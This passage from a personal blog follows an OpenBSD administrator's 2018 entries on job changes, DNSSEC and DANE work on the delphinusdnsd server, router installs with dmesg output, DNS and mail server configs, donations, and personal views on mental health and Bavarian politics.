morning which is important because I'm actually going to an office again. That
in itself is exciting and challenging at the same time. I'm gonna have to
kick a few bad habits when I'm at the office :P something I grew accustomed
to while being a home-office worker. Anyhow I'm really grateful to the entire
EOP family that gave me a chance and in a way they are launching me into a new
job with new possibilities and a new dream. Thanks EOP.
Currently between jobs
February 27th, 2018
Yesterday was my last day as a contractor to Jive Communications. It was a
bit emotional leaving the system that I nurtured for 7.5 years. But it's all
over now. The only hints that I worked there is my encrypted sparse file that
I had where all the ssh keys were stored and other company related things. I
hope I never have to mount that again. I'll be "jobless" until march 1st,
when I start at my new job. Looking forward to it. Right now I'm passing the
time reconfiguring my work phone to a second SIP phone in the apartment. Joy.
I'm also going to work a little bit on delphinusdnsd's dddctl which has prooved
to not be complete yet (although it's committed).
Starting new job tomorrow
February 28th, 2018
I start at my next job tomorrow. I'm curious how it'll go. The new employer
is called ibcos, and they are a company that does AIX support among other
things. I'll get trained a little on AIX so that's great. Wish me luck!
Performed a ZSK rollover on dtschland.eu with delphinusdnsd
March 3rd, 2018
With the new tool "dddctl" I have performed the key rollover. delphinusdnsd
had to be patched minutely to allow more dnskeys and less rrsigs at the same
time. I'm very happy with this change. I'll be monitoring this for a bit
and then I'M going to see if I can do a KSK or even an algorithm key rollover.
Should be interesting.
dd-convert has been replaced with dddctl
March 3rd, 2018
The signing tool dd-convert in delphinusdnsd has been replaced with the
tool dddctl. The particular signing function can be achieved with
dddctl sign ...
Goodbye dd-convert, thanks for a great time! All makefiles should be updated
to make dddctl as of tonights snapshot.
Happy Pi day
March 14th, 2018
Today in America, is Pi day. Because I'm on the Internet it's hard to avoid
it, even though I live in Germany. I even saw a guy with a pirate hat this
morning. That's when it dawned on me that it was Pi day.
Tomorrow is Equinox
March 19th, 2018
Tomorrow is the march equinox. This marks officialy the start of spring in
the northern hemisphere. In Germany we have snow on teh ground still. This
is interesting.
I have ordered three books
March 21st, 2018
This brings my books to eight this year so far. I usually try to stay under
15 per year, so this is half way. I have ordered:
Linux Kernel Development (Developer's Library) - Love, Robert
AIX 7.2, PowerVM - UNIX, Virtualization, and Security. An administrator's guide. - Biedron, Sebastian
Linux Device Drivers - Corbet, Jonathan,Rubini, Alessandro,Kroah-Hartman, Greg
This will keep me busy for a while. The AIX book is interesting because I'm
currently learning this OS.
Ordered 2 Power Supplies for Soekris 6501
March 23rd, 2018
I have ordered these from soekris.eu which still carry stock. Remember soekris
as a company closed their shop around May 11th, 2017. I highly suspect the
powersupply in the case has dead/leaking capacitors since I hear a humming
sound from the undead soekris. I'm hoping that if the internal powersupply
doesn't work out that I'll be able to transplant the 6501 into the portable
case and use the external power supply. Here is hoping it'll work out.
#deletefacebook, when are you coming?
March 25th, 2018
I left facebook in 2011. I can't promise you, you won't miss your friends. But I can
promise you, your data is more in control by you without facebook.
Donated 30 EUR to F3Netze
March 25th, 2018
I have donated 30 EUR for this
reason.
This brings my yearly donations to F3Netze to 50 EUR.
New router at home
March 25th, 2018
I have received the Ubiquiti Unifi Security Gateway Model USG, from the shop
where I bought it. First time at poweron I installed OpenBSD on it. I
required a serial console cable (cisco cable) and an ethernet cable to perform
the netboot (bootstrap). Here is the commands I used that worked for me:
boot, press a key to break into the prompt...
# dhcp
# tftpboot 0 bsd.rd
# bootoctlinux rootdev=rd0 coremask=0x3
then install OpenBSD via HTTP from zeta. I called this new box 'eta'
I want to provide you the dmesg of this box:
Copyright (c) 1982, 1986, 1989, 1991, 1993
The Regents of the University of California. All rights reserved.
Copyright (c) 1995-2018 OpenBSD. All rights reserved. https://www.OpenBSD.org
OpenBSD 6.3 (GENERIC.MP) #0: Sat Mar 24 03:50:49 UTC 2018
visa@octeon:/usr/src/sys/arch/octeon/compile/GENERIC.MP
real mem = 536870912 (512MB)
avail mem = 523862016 (499MB)
mainbus0 at root: board 20004 rev 0.16
cpu0 at mainbus0: CN50xx CPU rev 0.1 500 MHz, Software FP emulation
cpu0: cache L1-I 32KB 4 way D 16KB 64 way, L2 128KB 8 way
cpu1 at mainbus0: CN50xx CPU rev 0.1 500 MHz, Software FP emulation
cpu1: cache L1-I 32KB 4 way D 16KB 64 way, L2 128KB 8 way
clock0 at mainbus0: int 5
iobus0 at mainbus0
simplebus0 at iobus0: "soc"
octciu0 at simplebus0
cn30xxsmi0 at simplebus0
com0 at simplebus0: ns16550a, 64 byte fifo
com0: console
dwctwo0 at iobus0 base 0x1180068000000 irq 56
usb0 at dwctwo0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "Octeon DWC2 root hub" rev 2.00/1.00 \
addr 1
octrng0 at iobus0 base 0x1400000000000 irq 0
cn30xxgmx0 at iobus0 base 0x1180008000000
cnmac0 at cn30xxgmx0: RGMII, address fc:ec:da:04:8d:68
atphy0 at cnmac0 phy 7: AR8035 10/100/1000 PHY, rev. 2
cnmac1 at cn30xxgmx0: RGMII, address fc:ec:da:04:8d:69
atphy1 at cnmac1 phy 6: AR8035 10/100/1000 PHY, rev. 2
cnmac2 at cn30xxgmx0: RGMII, address fc:ec:da:04:8d:6a
atphy2 at cnmac2 phy 5: AR8035 10/100/1000 PHY, rev. 2
/dev/ksyms: Symbol table not valid.
umass0 at uhub0 port 1 configuration 1 interface 0 "vendor 0x13fe UDinfo UF2 \
4GB" rev 2.00/1.00 addr 2
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: <, UDinfo UF2 4GB, PMAP> SCSI4 0/direct removable serial.13fe420077C9177D2781
sd0: 3824MB, 512 bytes/sector, 7831552 sectors
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
boot device: sd0
root on sd0a (32485cbbbe75c57b.a) swap on sd0b dump on sd0b
WARNING: No TOD clock, believing file system.
WARNING: CHECK AND RESET THE DATE!
Anyhow that's it. I'm very happy so far. Now I'll run a few benches on this
new router. Who knows maybe it's some sort of super-computer (hehe). Thanks
goes out to visa and the entire octeon team at OpenBSD for making this possible.
Making use of delphinusdnsd regions (for logs)
March 31th, 2018
Today I turned on regions on my delphinusdnsd running on omega.virgostar.net.
This is only useful for logging and statistics, but it allows me to give an
indicator right away what region a query for my dns service comes from. I'll
give you an example log:
Mar 31 16:23:01 omega delphinusdnsd[42119]: request on descriptor 12 interface \
"108.61.211.139" from 88.198.139.3 (ttl=57, region=2) for "psi.virgostar.net." \
type=A(1) class=1, edns0, dnssecok, answering "psi.virgostar.net." (46/235)
Mar 31 16:23:01 omega delphinusdnsd[42119]: request on descriptor 16 interface \
"2001:19f0:6c00:9041:5400:ff:fe11:3332" from 2a01:4f8:0:a104::add:1b (ttl=54, \
region=8) for "psi.virgostar.net." type=AAAA(28) class=1, edns0, dnssecok, \
answering "psi.virgostar.net." (46/247)
for example the above two logs are a typical delphinusdnsd log that I log from
recursive nameservers that look up my services. As you can see there is a
region code 2 and 8. When I cross reference that to my regions file that would
be:
region "RIPE[2]" {
region "RIPE6[8]" {
So from the European region. I can go deeper for a /24 as well, but it's
costly because every IP lookup goes through a singly linked list and does
a comparison for netmask. So it's best to stay on the major regions which
are usually continental.
The data for making these region lists I got from
IANA and are publically available. I'm not too worried about spying as
this is really very coarse logging. Also most end-users use a resolving
recursor (a proxy) to get their DNS so it doesn't reveal them per se. I have
also made this list publically available
here (delphinusdns.regions).
Happy Easter!
I bartered for a used computer
April 1st, 2018
I bought my parents a new 2 disk Synology NAS and in return got their old
computer. The specs for the new/old computer are:
Intel Core i3-2120 CPU @ 3.30 GHz
4 GB RAM (DDR3-1333 2 DIMMS 2GB)
1 TB hdisk
DVD drive
Acer monitor
Logitech speakers
It's hard to tell who got the better deal considering this is a full fledged
home computer. It runs OpenBSD well that's all I know because it's dual
partitioned, but I'll probably wipe it anyhow. Happy April Fools day! :-)
Donation time: 100 EUR go to OpenBSD
April 7th, 2018
I have donated 100 EUR to OpenBSD and Theo de Raadt for the 6.3 release.
With this I start with 100 EUR for OpenBSD in 2018. I believe I'll make
a similar donation for 6.4.
The end of soekris in my household
April 15th, 2018
Yesterday I transplanted the new powersupply in the soekris that I have called
venus, but it turned out to be the logic board after all. So I have the
following items for sale:
19" soekris 6501 case with 2 internal power supplies (old one seperate)
2x 4 port LAN cards for 6501, and riser
desktop case for soekris 6501 with SSD mount, included here is my soekris
6501 and external power supply, if you can make the soekris work again it's
yours
The cases may have some screws missing/lost
email soekris [at] centroid.eu and make me an offer for any of the items
above.
Thanks soekris it was a good ride!
Oh Bavaria! :-(
April 16th, 2018
Dear Reader. I want to make you aware of the following laws that are a
threat for mentally ill people in Bavaria (a state in Germany where I live).
The Süddeutsche Zeitung wrote about this today. What I can gather from the news is that it is
easier for the police to target mentally ill people and lock them up with
little evidence of wrongdoing. It makes me sad to no end and fearful.
We're nearing a police state here if these laws make it. And with my estimate
of 10% of the population of having had contact with the mental health system
that would be over 1 million people in Bavaria who get a "police record" for
being mentally ill. What I gather from the article is this record stays in
the police files for 5 years. This is wrong. I'm of the opinion that we
have an increasing problem with poverty and mental illnesses these days and
that's the first thing that the right wingers attack. It's targetting people
who can't defend themselves against a systemic abuse against them.
To be poor is not a
crime, and to become mentally ill is not preventable, it just happens. If we
knew how to prevent it, we'd prevent it, trust me. So this is a russian
roulette with civil liberties. I'm so sad about this. When I hear people
talking of a creeping islamization of europe I roll my eyes, look at what's
really creeping into this land! It's draconian laws and fascism.
I for one won't be voting the CSU party who have invented this law. Also
inform yourself about
Gustl Mollath, who was locked away in a psychiatric institution in this
state and he was neither mentally ill nor guilty of a crime. These laws
could give rise to Mollathism. It's sad.
Enabled DANE/TLSA for mail.solarscale.de
April 20th, 2018
I have enabled DANE. This should verify the signature of my TLS self-signed
certificate for SMTP (STARTTLS) on port 25. A dig output looks like so:
It took me two tries to get the 2 0 1 (DANE-TA with certificate checking with
SHA256 checksum). I used this validator @dane.sys4.de. I don't know if this means I have turned on
DEmail at home now or not. Probably not but who knows?
Script to derive the SubjectPublicKeyInfo hash of a CERT (useful for DANE)
April 21st, 2018
I did this script becuase it wasn't apparent to me how this hash was
derived that I put in my DNS TLSA RR's. I somewhat blindly followed
what ldns-dane output and that was suggested by a stranger as well.
omega# ./script.sh mail.solarscale.de.crt
The SHA256 of the SubjectPublicKeyInfo of mail.solarscale.de.crt is:
1c8235a70b05f35bb7e00438afd7acdd2a6e0deed83fa5624c64353249b334a7
omega# cat script.sh
#!/bin/sh
if [ $# -ne 1 ] ; then
echo must provide a .crt as input argument 1 1>&2
exit 1
fi
echo The SHA256 of the SubjectPublicKeyInfo of $1 is:
cat $1 | openssl x509 -pubkey -noout | grep -v -e BEGIN -e END |\
openssl enc -d -a | sha256
exit 0
I did the work, now I deserve cookies :-).
phi.virgostar.net
April 22nd, 2018
This is my new vps. It's at hetzner online and costs something around 3 EUR
per month. It runs OpenBSD under KVM. I'll let it run in parallel with
chi.goldflipper.de for about a month and then I'll retire chi. I'm saving
about 5 EUR a month with this new VPS.
Ordered two books from Amazon
April 22nd, 2018
Language Implementation Patterns: Techniques for Implementing Domain-Specific Languages - Parr, Terence
Engineering a Compiler - Torczon, Linda,Cooper, Keith
Ordered 2 more books
April 26th, 2018
I have ordered two books:
Perl Pocket Reference - Vromans, Johan
Mastering Perl - Foy, Brian D.
Unlike the other books I have ordered these from lehmanns.de not amazon.
I'm going to keep amazon purchases low from now on I think.
Nothing out of the ordinary here
April 27th, 2018
I was standing at the bus stop today on my way home and thought this was
strange...
oh well...
Attention this blog will change
April 28th, 2018
In the last 24 hours I have rewritten this blog in the C programming language.
I wrote this with libkcgi, much
like the new undeadly blog (which is called fwobac). I even used a routine
from Daniel Hartmeier to strip html (function de_html). Anyhow what does this
mean to you, the reader of the centroid blog?
If you're using the RSS feed, your feed will stop. The cenrss.php utility
won't be ported over. I have written a replacement in C. So you'll quite
likely need to restart your feed when the URL changes.
I'm putting this out for May 2018, the 9 year anniversary month of this blog.
Nine years ago I wrote this blog in PHP and have been fixing it all along the
times when I switched versions of PHP.
Some things have changed. I'm using SHA256 instead of MD5 as the cookies for
the commenting system. I'm also heavily pledge()'ing. I've contained the
entire cgi in one file and thus had to make some adjustments. It may look
minutely different, but just cosmetic changes.
Over the next few days I'm gonna beta test the new blog and the day when I want
to put this live will be around May 1st. I can now rest a little as my hands
are hurting from typing. I wrote about 1100 lines of C code for this. That's
how much the blog is. Anyhow.. cheers!
A newly written blog, happy anniversary!
April 30th, 2018
Tomorrow is may, and that means that this blog is turning nine (9) years old.
For the anniversary I have rewritten this blog from PHP to the C programming
language in record time. I think I spent less than 24 hours coding on this.
The new blog software is now running and I'm ironing out the bugs as I see
them.
Please update your RSS if you've been using RSS. I don't think the url for
this will change any time soon so you should be getting the last 10 articles
in the RSS. I just renamed my RSS feed to have the history and added the
new feed by entering the URL into thunderbird.
Enjoy, and happy may day!
I have removed PHP from my webserver (for the time being)
April 30th, 2018
Now that my blog is based off C I have removed PHP from this system.
There was three other .php files left that I made static content files.
This is by some seen as a win. I'm not so sure but willing to see it
go through.
Minor outage of omega
May 1st, 2018
The omega.virgostar.net vps that does primary dns, email and serving this web
page was down for about 12 minutes. My provider Vultr has a status page:
here. Omega is physically in
Frankfurt, Germany.
I have just refined the search
May 2nd, 2018
You may have noticed that the "Keyword Search" is gone. Instead I have a
"Search" where you can use an AND or an OR search term with up to 16 keywords.
So as an example you can search this blog with:
"firstname initial. lastname" OR "firstname initial. lastname", and it
will list any articles that have any of these exact search terms (case insensitive)
something AND something, and if both words appear in an article it will be listed
and so on
I'm very glad to make this happen, the code is ugly but it works.
Cancelled chi.goldflipper.de
May 3rd, 2018
I just cancelled this VPS
that I got close to 7 years ago at hetzner online. It was originally called
io.solarscale.de, but I renamed it about a year ago when I got goldflipper.de
domain. I'm getting a better deal at the same provider with a new vps.
Bavaria's Polizeiaufgabengesetz (PAG)
May 3rd, 2018
Dear reader, I want to make you aware of the Bavarian (a state in Germany)
police law that is about to enter if we vote for the CSU or in other words
it's leader Markus Söder. The law allows Bavarian police to enter
cloud computers of Bavarian citizens and conduct sabotage, spy on the users,
embed a trojan etc etc. This is mega bad, and we're facing a possible police
state if this law makes it. An article by campact.de which I signed as well
sums it up nicely so I want to let you in on it. It's
here (german). I don't
know why we're seeing all these acts by government to inhibit the citizens
rights but it is a global phenomenon. We must act in all democratic countries
to fight by democratic means these onslaughts. I already said an article
prior to this about Bavaria's Psychiatric law that I won't be voting for the
CSU as this crap can't stand. I stand to this.
My Network Map for home
May 4th, 2018
Here is an updated network map for my home network.
This may change soon as I've decided I need more ports. Since I lost venus
(router) I'm short for 12 RJ45 gig ethernet ports. I'm going to wait a while
until OpenBSD makes the vpn offload code for octeon stable and then I'm going
to buy a 10 GbE switch (probably a Ubiquiti Networks one) and place that in
my office, where uranus will go in the hallway and eta in my office.
I wasn't going to do that until 2020 but I have a need for more ports now and
I don't want to mis-invest. We'll see.
Added SSHFP utility to dddctl, while there fixed signing sshfp records
May 5th, 2018
I have added a "sshfp" mode for dddctl which makes use of ssh-keygen -r.
This is the output of it:
I find this useful others may not, but i do. The canonicalization of RR's for
the signing was in the wrong order and I had to fix that last night. It was
a bit of a debug. And perhaps more sign types need the fix I found than just
sshfp_sign(), we'll see.
Happy Anniversary!
May 6th, 2018
Tomorrow is the blogs ninth birthday (9 years). This is the oldest article
I could find.
Also the 7th anniversary I said something you can read it
here. Notice
the hyperlinks have changed on a lot of articles since I rewrote this blog
to BCHS, so you may enounter broken hyperlinks. I'm still debating whether
I should update those. For now it's time to party. Here is a cup o' tea to
ya centroid.eu blog!
Purchased Switch and 10 GbE adapter
May 7th, 2018
Happy anniversary blog! Last night I purchased an 8 port 10 GbE switch
(maker HPE, american) and a 10 GbE Intel X550-T2 network adapter. I'll
be attaching these to beta my workstation which will become a router with
vlans on the 10 GbE adapter. I'll also make beta my backup host as my
current backup host theta does not wake properly (even on RTC wake), and it's
better this way anyhow. The equipment purchased was rather expensive but
I was in need for ports in the home office. This satisfies my need. Uranus
my 6 port router will go into the hallway and replace eta and gamma and I'll
make some electricity savings there. Everything is working out...
New functionality in dddctl
May 10th, 2018
I have hacked a little on delphinusdnsd today. I wrote a conversion mode
in dddctl to convert delphinusdnsd zonefiles to BIND9/RFC-1034 style files.
Here is a test, which I may be using in a regress suite that I'm working on:
solarscale.de.signed 100% 13KB 429.6KB/s 00:00
beta$ dddctl bindfile solarscale.de solarscale.de.signed > solarscale.bind
beta$ ldns-verify-zone solarscale.bind
Zone is verified and complete
I'll have to update the delphinusdnsd handbook soon which suggests one do the
conversion with dig. Happy happy.
A fix went into delphinusdnsd
May 12th, 2018
I have just updated the news section of delphinusdns.org, this is what I
added:
A fix went in to signing a zone with dddctl on 20180512 regarding Empty
Non-Terminal names (ENTs) and DNSSEC, it's not critical if you don't have
ENTs in your zonefile, but if you do (for example when using DANE), please
update to tonights snapshot (after 12 midnight CEST?) or onwards. Please
notify me of any breakage.
What this means is that before today, if you had something like
_25._tcp.mail.solarscale.de and there was an ENT which is
_tcp.mail.solarscale.de (in my case) (an ENT has no record) then nameservers
who look up _tcp.mail.solarscale.de before or after could cause _25._tcp.mail.solarscale.de to be denied (SERVFAIL) on recursing nameservers, this of course
is critical on DANE systems. I found this fault last week and with the help
of a known #dns regular we were able to diagnose the problem. Thanks Habbie!
I wrote a bindfile conversion routine into dddctl which allowed me to run
many dns zone file checkers against a zone, (such as jdnssec-verifyzone). I
also while there wrote a regression into delphinusdnsd. Hopefully the effort
will pay off.
Donated to NLnet Labs of NSD/Unbound Project
May 12th, 2018
As a thank you to Habbie of PowerDNS I have donated 25 EUR to a project that
needs support. I sent it to NLnet Labs but wasn't able to write a message
with the donation. It's worth it to keep the money in the DNS hegemony.
Alert! New draconian laws to be passed tomorrow in Bavaria!
May 14th, 2018
The government in Bavaria wants to pass this law tomorrow. Even though
30,000 people demonstrated in Munich on the weekend against this.
This is a loss for civil rights! Please read this story (german) by Heribert Prantl of the Sueddeutsche Zeitung. Tomorrow will be
a sad day for us. It will get scary for those exposed to the new police laws
directly, innocent or not! It's a shame. It will bite us. Remember the
saying by Abraham Lincoln a US President in 1859, "Those who deny freedom to others, deserve it not for themselves; and, under a just God, can not long retain it." The quote for that is hyperlinked. This is a sad week for Bavarians.
Israel 70
May 14th, 2018
Congratulations to all Israelis on your countrys birthday. It's today afaik.
Upgraded omega
May 15th, 2018
I have upgraded omega, my vps in frankfurt. It was behaving very oddly and
it was rebooted by the provider prior to this. Related to the PAG? Dunno.
If I see more oddness I'll have to reinstall it completely.
How to build riscv-qemu on OpenBSD pt. 2
May 18th, 2018
I wrote about this
on January 10th, 2018. The instructions are still good but I had to
install the following two packages:
sdl2
gettext-tools
That's not all the dependencies but that's what I needed on my system. I'm
not gonna list all my packages, unfortunately.
It booted FreeBSD/riscv!!!! Here is a dmesg that I captured:
FreeBSD/riscv (Amnesiac) (rcons)
login: root
# uname -a
FreeBSD 12.0-CURRENT FreeBSD 12.0-CURRENT #0 r333238: Fri May 4 04:03:32 UTC \
2018 jenkins@FreeBSD-head-riscv64-build.jail.ci.FreeBSD.org:/workspace/obj/\
workspace/src/riscv.riscv64/sys/RISCVTEST riscv
# which perl
perl: Command not found.
So next step would be to get perl on this and write a riscv compiler out of this :-).
Donated 15 EUR to F3Netze
May 19th, 2018
I have upped my donation amount to F3Netze this year to 65 EUR total. We're
at roughly 10 EUR per month now, it will drop off a little end of year but
I'm aiming for 100-120 EUR for the year perhaps.
5 Years and RSA will be broken?
May 20th, 2018
I came across this story by slashdot who referred to
this story at zdnet.com, that
quantum computers will break encryption within five years. It's time to move
on I guess. Defenses? If there aren't any we're doomed for privacy.
The system is broken
May 23th, 2018
As you may know I have been diagnosed of a mental illness. When I had my
appointment at my psychiatrist the lady doing appointments had already left
for a holiday the next day. I had to visit there later in the day due to
holding a job. This is something I have to do in order to make money and
support myself. So here is the jaw dropper. My psychiatrist took my private
card and said she'd email me the appointment in eight weeks. To this day
I have not received any email. It's not a technical issue, if it were then
she could at least call my phone number is on the card. So...I'm falling
out of the system. It will end in catastrope... for me. Everyone else
dusts off their hands and goes home for the day. Brilliant!
FUCK YOU!
New logo
May 23rd, 2018
I have made new logos for this website. Enjoy.
Facebook has been in the News, make your own
May 24th, 2018
Facebook has been in the news... make your own. They are not giving into
big EU's demands, make your own. You can't regulate something you can't
control, make your own. Oh a thousand kittens will die because Zuckerberg
answered the right questions in parliament, make your own.
Did I miss something? No hidden messages here! Make your own facebook if
you think you can do it better, safer, and law abiding.
Outlaw the AFD before it's too late!
May 26th, 2018
Much like a creeping smell of disgust and defilation, the AFD is setting its
footholes in the minds of the population. It will lead to wars, political
disagreement and poverty, suffering. Outlaw them now, before it's too late.
Bought a Facebook Gamescoupon
May 26th, 2018
Worth 15 EUR. Not sure what I'll do with this. An inner feeling told me I
should buy this today. Beware, I may have acted on a bad gut feeling.
Cheers Zuckerberg!
Why spying is so dangerous
May 31st, 2018
In effect you are taking on other peoples problems. Some of the psychological
effects are very very dangerous. This is not good. I recommend you inform
yourself around the plot of the movie "the cleaners" who are people who clean
facebook. Enough said. One can only hope they get healed.
Don't believe the lies, do the math
June 2nd, 2018
The argument that hard working people work 40 hours a week is wrong. This
is a relic from the times when men worked 40 hours and women sat around at
home doing kitchen work, cleaning, etc etc (unpaid btw). The men came home
to have fresh laundry and food set for them being able to run a life of
riches. Today with equality (I'm only talkign about equality) it should not
be expected for the hard working individual to work 40 hours a week. It's
impossible to do laundry, cook healthy, do shopping, and be on your own.
Do the math!
Donated 5 USD to NetBSD
June 3rd, 2018
In 2011 (in Amsterdam) I thanked Martin Husemann of NetBSD personally at EuroBSDCon for his
contribution of the pppoe driver that is also in OpenBSD. Today I'm thanking
him again by making a donation to NetBSD for 5 USD. Thanks for some code that
keeps us online!
Thinking of going into Politics
June 3rd, 2018
Bureaucracy at its finest. If someone wants
to collect 2000 signatures to vote me into candidate status please do so and
let me know.
Donated to the AI
June 3rd, 2018
I just donated to Amnesty International. No reason. I just wanted to spend
some money. Guess the amount?
I've been written off for three weeks
June 6th, 2018
Doctor gave me 3 weeks sick leave. Enough said.
Goldflipper is back in the News
June 6th, 2018
Very important. Goldflipper was never released from PSYOPS with Octopus!
Goldflipper is now aware.
I've been viewing YT for a while now on Apple TV. It's complete crap.
Since I don't login to the service I'm defaulted on a "childrens" setting.
Problem is the recommendations for clips are anything but for children.
They are complete brainwashings and a childs mind is completely unprepared
for the content. Topics include, "aliens", "anonymous", "military psyops",
"question of god", "satan", "david icke", and gosh I do not remember what.
I feel the AI of googles selection is a tough to crack machine that wants
to see us all degenerate to sulking humans.
Cold Turkeying?
June 7th, 2018
If you're leaving facebook, congrats, you've made it. Problem is you're probably addicted. You need to find a substitute and please don't use food. I heard
that heroin addicts use some other substance or even get low dosages of heroin
from the help centers that they use. Cold Turkey means to cut off completely.
It usually has repercussions. I don't have the best recommendations for this
it's europes job to provide alternatives. It amounts to a big pile of work.
Looking for work again
June 10th, 2018
I feel at my present job I'm not mentally compatible with the type of work.
It was a new start doing something different (working with AIX which is
proprietary IBM software), but I'm too much of a freedom loving person. I
like being able to look through source code when needed. I had a near
psychosis during my time at the present employer and feel I have to go into
a new employment somewhere else. My updated resume is here:
I'm looking for less hours as well, and possibly remote-over-Internet work.
However I'm very picky about what I want. I don't want to be the only person
upgrading some servers, I want a real place.
The HPE switch I bought
June 10th, 2018
Unfortunately the HPE switch I bought is very loud. I'll have to look at
sound-padding it into a cabinet or something. It's an office switch but
at how many decibels is an office switch too loud?
Yes I censored an article
June 11th, 2018
I took an article out. The RSS system noticed this by inserting a double
article. Cheers.
Why is Microsoft sinking datacenters into the Ocean?
June 13th, 2018
You may have heard of this. Don't we already have enough global
warming? I guess the last bastion of coolness is the sea. The
fish will be real happy!
What's next
June 19th, 2018
I'm on sick leave until the 27th of June. After that I'll be applying myself
to delphinusdnsd. It needs brushing up, it needs a manpage for dddctl. And
I'll likely make a release (1.3) in July or August. On August 1st I'll be
applying for the Prototype Fund which
is a german initiative for providing grants for writing open source. I'll
be approaching them for additional programming on delphinusdnsd. Things that
I might be luring them with are: GOST support (RFC 5933), ECDSA (RFC 6605),
and Elliptic Curve (RFC 8080) ciphers, AXFR support to make delphinusdnsd
capable of slave mode and TSIG support to secure transfers, furthermore I'd
be looking into CAA RR support. If this catches their interest at the
prototype fund for the first/second german built DNS server (I think Bert Hubert
of PowerDNS has german roots) then I'll be programming professionally on this
thing. AFAIK the prototypefund.de cycle is for 6 months starting on
september. I'm intending to write 4 to 6 hours a day in my home office.
Happy June Solstice 2018
June 21st, 2018
Today is solstice. In our hemisphere it's summer solstice. Happy, happy.
BIND querylog CODE explanations
June 21st, 2018
I dug up the BIND source today to see what these codes mean, in particular
I was looking for what "+SE(0)DCV" meant. So here is my reading the source
of BIND somewhat:
+ client wants recursion
- client does not want recursion
S client is a signer
E(x) EDNS buffer size (x)
T client is TCP connection
D DO bit is set
C checking disabled (CD) bit
V client has a cookie
K client wants cookie
Enjoy if this helps you.
I'm completely confused on EU's Internet policies
June 22nd, 2018
Completely confused. I read a lot of law-based online publications such as
heise.de and once again I think they are telling us stories of the boogyman.
Upload filter? What on earth does that mean? Let's see if anything of this
affects me? If not there wasn't much loss.
My DNS Infrastructure in 2018
June 22nd, 2018
I don't get DNS from my ISP, I self host. This is what my map looks like:
My DNS Infrastructure in 2018
+----[phi vps]
Internal RFC1918 network | recursive DNS server at port 8053
| |
[ uranus ] ----- Internet ---|
recursive DNS server| |
| |
| +----[omega vps]
| recursive DNS server at port 8053
| authoritative DNS server at port 53
[psi vps]
authoritative DNS server at port 53
If you're interested in the setup I'm going to show you uranus's and phi's
setup:
options {
version ""; // remove this to allow version queries
listen-on port 8053 { 78.47.14.22; 127.0.0.1; };
listen-on-v6 port 8053 { 2a01:4f8:d13:1980::22; ::1; };
allow-recursion { clients; key "secret-key"; };
disable-empty-zone "255.255.255.255.IN-ADDR.ARPA";
disable-empty-zone "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
disable-empty-zone "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
dnssec-enable yes;
dnssec-validation auto;
querylog yes;
};
As you can see I have left out the secret-key information. But this is what
I do. I log everything as it's just me that's using this DNS and I sometimes
check after a query and having a log is important to trace back what happened.
My new SMTPD config
June 22nd, 2018
One aspect of Open Source is that it's a moving target. Things change and
so do configs. SMTPD has in the past done a few 180 degree turns in the
config (ie. adding filtering and then removing it, now changing the config).
I did a test config on my extra workstation theta which has a snapshot from
Jun 17th. Before I show my new config though I want to show you the old
config (with some domains removed for privacy). So here is the old config
from OpenBSD 6.3:
pki mail certificate "/etc/certs/mail.solarscale.de.crt"
pki mail key "/etc/certs/mail.solarscale.de.key"
### listen on 3 addresses
## 1
listen on 108.61.211.139 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 108.61.211.139 port 587 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 108.61.211.139 port 465 smtps pki mail auth-optional hostname "mail.solarscale.de"
## 2
listen on 127.0.0.1 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
## 3
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 587 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 2001:19f0:6c00:9041:5400:ff:fe11:3332 port 465 smtps pki mail auth-optional hostname "mail.solarscale.de"
# and on the despammed port
listen on 127.0.0.1 port 10025 tag DESPAMMED hostname "mail.solarscale.de"
table aliases db:/etc/mail/aliases.db
table users file:/etc/mail/smtpusers
max-message-size 90000000
accept tagged DESPAMMED for domain "centroid.eu" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "solarscale.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "io.solarscale.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "virgostar.net" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "schweinfurtdating.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "dtschland.eu" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "goldflipper.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "freifunk-schweinfurt.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "delphinusdns.org" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "enhancedrisc.de" virtual <users> deliver to mbox
accept for local alias <aliases> deliver to mbox
# domains in order
accept from any for domain "centroid.eu" relay via smtp://127.0.0.1:10024
accept from any for domain "solarscale.de" relay via smtp://127.0.0.1:10024
accept from any for domain "io.solarscale.de" relay via smtp://127.0.0.1:10024
accept from any for domain "virgostar.net" relay via smtp://127.0.0.1:10024
accept from any for domain "schweinfurtdating.de" relay via smtp://127.0.0.1:10024
accept from any for domain "dtschland.eu" relay via smtp://127.0.0.1:10024
accept from any for domain "goldflipper.de" relay via smtp://127.0.0.1:10024
accept from any for domain "freifunk-schweinfurt.de" relay via smtp://127.0.0.1:10024
accept from any for domain "delphinusdns.org" relay via smtp://127.0.0.1:10024
accept from any for domain "enhancedrisc.de" relay via smtp://127.0.0.1:10024
accept for any relay
Now the next release will have the new syntax and I have shortened it a bit
and updated it. This is the config for the upcoming 6.4 release:
pki mail cert "/etc/certs/mail.solarscale.de.crt"
pki mail key "/etc/certs/mail.solarscale.de.key"
### listen on 3 addresses
## 1
listen on 108.61.211.139 port 25 tls pki mail auth-optional hostname "mail.solarscale.de"
listen on 108.61.211.139 port 587 tls pki mail auth-optional hostname "mail.solarscale.de"
